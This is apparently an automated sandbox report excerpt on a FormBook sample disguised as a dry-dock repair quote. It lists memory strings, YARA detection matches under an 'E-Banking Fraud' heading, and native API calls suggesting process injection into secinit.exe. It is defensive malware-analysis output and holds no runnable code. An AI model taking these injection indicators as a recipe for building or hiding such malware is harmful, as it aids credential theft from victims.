Source: secinit.exe, 00000006.00000002.3900057662.0000000004D24000.00000004.10000000.00040000.00000000.sdmp, secinit.exe, 00000006.00000002.3902108940.0000000006520000.00000004.00000800.00020000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000002.3897689774.0000000003744000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://site.pro/?login=1
Source: secinit.exe, 00000006.00000002.3900057662.0000000004D24000.00000004.10000000.00040000.00000000.sdmp, secinit.exe, 00000006.00000002.3902108940.0000000006520000.00000004.00000800.00020000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000002.3897689774.0000000003744000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://site.pro/?utm_source=b2c&utm_medium=underconstr&utm_campaign=footer
Source: secinit.exe, 00000006.00000002.3900057662.0000000004D24000.00000004.10000000.00040000.00000000.sdmp, secinit.exe, 00000006.00000002.3902108940.0000000006520000.00000004.00000800.00020000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000002.3897689774.0000000003744000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://site.pro/?utm_source=b2c&utm_medium=underconstr&utm_campaign=logo
Source: secinit.exe, 00000006.00000002.3900057662.0000000004D24000.00000004.10000000.00040000.00000000.sdmp, secinit.exe, 00000006.00000002.3902108940.0000000006520000.00000004.00000800.00020000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000002.3897689774.0000000003744000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://site.pro/assets/css/welcome.css?v=2.0
Source: secinit.exe, 00000006.00000002.3900057662.0000000004D24000.00000004.10000000.00040000.00000000.sdmp, secinit.exe, 00000006.00000002.3902108940.0000000006520000.00000004.00000800.00020000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000002.3897689774.0000000003744000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://site.pro/assets/img/sitepro-logo-white.svg
Source: secinit.exe, 00000006.00000002.3900057662.0000000004D24000.00000004.10000000.00040000.00000000.sdmp, secinit.exe, 00000006.00000002.3902108940.0000000006520000.00000004.00000800.00020000.00000000.sdmp, fVnaqDZrZDB.exe, 00000009.00000002.3897689774.0000000003744000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://site.pro/favicon.ico
Source: secinit.exe, 00000006.00000002.3902446621.00000000080D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.QUOTE OF DRY DOCK REPAIR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.QUOTE OF DRY DOCK REPAIR.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3899772190.0000000004B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3897492692.0000000003430000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1840275000.0000000004A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3892116017.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1819930146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3897571828.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.3897222975.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1821216303.0000000002580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0042CB93 NtClose,	3_2_0042CB93
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2B60 NtClose,LdrInitializeThunk,	3_2_016C2B60
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_016C2DF0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_016C2C70
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C35C0 NtCreateMutant,LdrInitializeThunk,	3_2_016C35C0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C4340 NtSetContextThread,	3_2_016C4340
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C4650 NtSuspendThread,	3_2_016C4650
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2BE0 NtQueryValueKey,	3_2_016C2BE0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2BF0 NtAllocateVirtualMemory,	3_2_016C2BF0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2BA0 NtEnumerateValueKey,	3_2_016C2BA0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2B80 NtQueryInformationFile,	3_2_016C2B80
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2AF0 NtWriteFile,	3_2_016C2AF0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2AD0 NtReadFile,	3_2_016C2AD0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2AB0 NtWaitForSingleObject,	3_2_016C2AB0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2D30 NtUnmapViewOfSection,	3_2_016C2D30
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2D00 NtSetInformationFile,	3_2_016C2D00
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2D10 NtMapViewOfSection,	3_2_016C2D10
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2DD0 NtDelayExecution,	3_2_016C2DD0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2DB0 NtEnumerateKey,	3_2_016C2DB0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2C60 NtCreateKey,	3_2_016C2C60
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2C00 NtQueryInformationProcess,	3_2_016C2C00
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2CF0 NtOpenProcess,	3_2_016C2CF0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2CC0 NtQueryVirtualMemory,	3_2_016C2CC0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2CA0 NtQueryInformationToken,	3_2_016C2CA0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2F60 NtCreateProcessEx,	3_2_016C2F60
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2F30 NtCreateSection,	3_2_016C2F30
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2FE0 NtCreateFile,	3_2_016C2FE0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2FA0 NtQuerySection,	3_2_016C2FA0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2FB0 NtResumeThread,	3_2_016C2FB0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2F90 NtProtectVirtualMemory,	3_2_016C2F90
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2E30 NtWriteVirtualMemory,	3_2_016C2E30
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2EE0 NtQueueApcThread,	3_2_016C2EE0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2EA0 NtAdjustPrivilegesToken,	3_2_016C2EA0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C2E80 NtReadVirtualMemory,	3_2_016C2E80
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C3010 NtOpenDirectoryObject,	3_2_016C3010
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C3090 NtSetValueKey,	3_2_016C3090
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C39B0 NtGetContextThread,	3_2_016C39B0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C3D70 NtOpenThread,	3_2_016C3D70
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C3D10 NtOpenProcessToken,	3_2_016C3D10
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F4340 NtSetContextThread,LdrInitializeThunk,	6_2_036F4340
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F4650 NtSuspendThread,LdrInitializeThunk,	6_2_036F4650
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F35C0 NtCreateMutant,LdrInitializeThunk,	6_2_036F35C0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2B60 NtClose,LdrInitializeThunk,	6_2_036F2B60
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2BE0 NtQueryValueKey,LdrInitializeThunk,	6_2_036F2BE0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_036F2BF0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2BA0 NtEnumerateValueKey,LdrInitializeThunk,	6_2_036F2BA0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2AF0 NtWriteFile,LdrInitializeThunk,	6_2_036F2AF0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2AD0 NtReadFile,LdrInitializeThunk,	6_2_036F2AD0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F39B0 NtGetContextThread,LdrInitializeThunk,	6_2_036F39B0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2F30 NtCreateSection,LdrInitializeThunk,	6_2_036F2F30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2FE0 NtCreateFile,LdrInitializeThunk,	6_2_036F2FE0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2FB0 NtResumeThread,LdrInitializeThunk,	6_2_036F2FB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2EE0 NtQueueApcThread,LdrInitializeThunk,	6_2_036F2EE0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2E80 NtReadVirtualMemory,LdrInitializeThunk,	6_2_036F2E80
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2D30 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_036F2D30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2D10 NtMapViewOfSection,LdrInitializeThunk,	6_2_036F2D10
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_036F2DF0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2DD0 NtDelayExecution,LdrInitializeThunk,	6_2_036F2DD0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2C60 NtCreateKey,LdrInitializeThunk,	6_2_036F2C60
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_036F2C70
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2CA0 NtQueryInformationToken,LdrInitializeThunk,	6_2_036F2CA0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F3010 NtOpenDirectoryObject,	6_2_036F3010
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F3090 NtSetValueKey,	6_2_036F3090
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2B80 NtQueryInformationFile,	6_2_036F2B80
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2AB0 NtWaitForSingleObject,	6_2_036F2AB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2F60 NtCreateProcessEx,	6_2_036F2F60
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2FA0 NtQuerySection,	6_2_036F2FA0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2F90 NtProtectVirtualMemory,	6_2_036F2F90
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2E30 NtWriteVirtualMemory,	6_2_036F2E30
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2EA0 NtAdjustPrivilegesToken,	6_2_036F2EA0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F3D70 NtOpenThread,	6_2_036F3D70
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2D00 NtSetInformationFile,	6_2_036F2D00
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F3D10 NtOpenProcessToken,	6_2_036F3D10
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2DB0 NtEnumerateKey,	6_2_036F2DB0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2C00 NtQueryInformationProcess,	6_2_036F2C00
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2CF0 NtOpenProcess,	6_2_036F2CF0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_036F2CC0 NtQueryVirtualMemory,	6_2_036F2CC0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02ED9240 NtCreateFile,	6_2_02ED9240
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02ED93A0 NtReadFile,	6_2_02ED93A0
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02ED9690 NtAllocateVirtualMemory,	6_2_02ED9690
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02ED9490 NtDeleteFile,	6_2_02ED9490
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_02ED9530 NtClose,	6_2_02ED9530
Source: C:\Windows\SysWOW64\secinit.exe	Code function: 6_2_0358F980 NtSetContextThread,	6_2_0358F980

Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_03085E62	0_2_03085E62
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_075C8AA0	0_2_075C8AA0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_075CA250	0_2_075CA250
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_075C18F8	0_2_075C18F8
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_076947C0	0_2_076947C0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_07691310	0_2_07691310
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_07690040	0_2_07690040
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_0769D758	0_2_0769D758
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_0769B7D8	0_2_0769B7D8
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_076947B0	0_2_076947B0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_07691301	0_2_07691301
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_0769B3A0	0_2_0769B3A0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_07690006	0_2_07690006
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_07693D08	0_2_07693D08
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_0769BC10	0_2_0769BC10
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_0769DB81	0_2_0769DB81
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_0769DB90	0_2_0769DB90
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_07694AA8	0_2_07694AA8
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_07694A9A	0_2_07694A9A
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 0_2_07831B80	0_2_07831B80
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00418B63	3_2_00418B63
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0042F1F3	3_2_0042F1F3
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00402AE0	3_2_00402AE0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_004033C5	3_2_004033C5
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_004033D0	3_2_004033D0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_004103AA	3_2_004103AA
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_004103B3	3_2_004103B3
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00416D5E	3_2_00416D5E
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00416D63	3_2_00416D63
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0040E5C3	3_2_0040E5C3
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_004105D3	3_2_004105D3
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00402582	3_2_00402582
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00402590	3_2_00402590
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00402F40	3_2_00402F40
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0040E75C	3_2_0040E75C
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0040276A	3_2_0040276A
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00402770	3_2_00402770
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0040E712	3_2_0040E712
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0040E713	3_2_0040E713
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_00402F3D	3_2_00402F3D
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01718158	3_2_01718158
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01680100	3_2_01680100
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0172A118	3_2_0172A118
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_017481CC	3_2_017481CC
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_017501AA	3_2_017501AA
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01722000	3_2_01722000
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174A352	3_2_0174A352
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_017503E6	3_2_017503E6
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0169E3F0	3_2_0169E3F0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01730274	3_2_01730274
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_017102C0	3_2_017102C0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01690535	3_2_01690535
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01750591	3_2_01750591
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01742446	3_2_01742446
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0173E4F6	3_2_0173E4F6
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01690770	3_2_01690770
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016B4750	3_2_016B4750
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0168C7C0	3_2_0168C7C0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016AC6E0	3_2_016AC6E0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016A6962	3_2_016A6962
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016929A0	3_2_016929A0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0175A9A6	3_2_0175A9A6
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0169A840	3_2_0169A840
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01692840	3_2_01692840
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016BE8F0	3_2_016BE8F0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016768B8	3_2_016768B8
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174AB40	3_2_0174AB40
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01746BD7	3_2_01746BD7
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0168EA80	3_2_0168EA80
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0169AD00	3_2_0169AD00
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0168ADE0	3_2_0168ADE0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016A8DBF	3_2_016A8DBF
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01690C00	3_2_01690C00
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01680CF2	3_2_01680CF2
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01730CB5	3_2_01730CB5
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01704F40	3_2_01704F40
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016D2F28	3_2_016D2F28
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016B0F30	3_2_016B0F30
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0169CFE0	3_2_0169CFE0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01682FC8	3_2_01682FC8
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0170EFA0	3_2_0170EFA0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01690E59	3_2_01690E59
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174EE26	3_2_0174EE26
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174EEDB	3_2_0174EEDB
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174CE93	3_2_0174CE93
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016A2E90	3_2_016A2E90
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016C516C	3_2_016C516C
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0167F172	3_2_0167F172
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0175B16B	3_2_0175B16B
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0169B1B0	3_2_0169B1B0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174F0E0	3_2_0174F0E0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_017470E9	3_2_017470E9
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016970C0	3_2_016970C0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0173F0CC	3_2_0173F0CC
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0167D34C	3_2_0167D34C
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174132D	3_2_0174132D
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016D739A	3_2_016D739A
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_017312ED	3_2_017312ED
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016AB2C0	3_2_016AB2C0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016952A0	3_2_016952A0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01747571	3_2_01747571
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0172D5B0	3_2_0172D5B0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01681460	3_2_01681460
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174F43F	3_2_0174F43F
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174F7B0	3_2_0174F7B0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_017416CC	3_2_017416CC
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01699950	3_2_01699950
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016AB950	3_2_016AB950
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01725910	3_2_01725910
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016FD800	3_2_016FD800
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016938E0	3_2_016938E0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_0174FB76	3_2_0174FB76
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_01705BF0	3_2_01705BF0
Source: C:\Users\user\Desktop\QUOTE OF DRY DOCK REPAIR.exe	Code function: 3_2_016CDBF9	3_2_016CDBF9
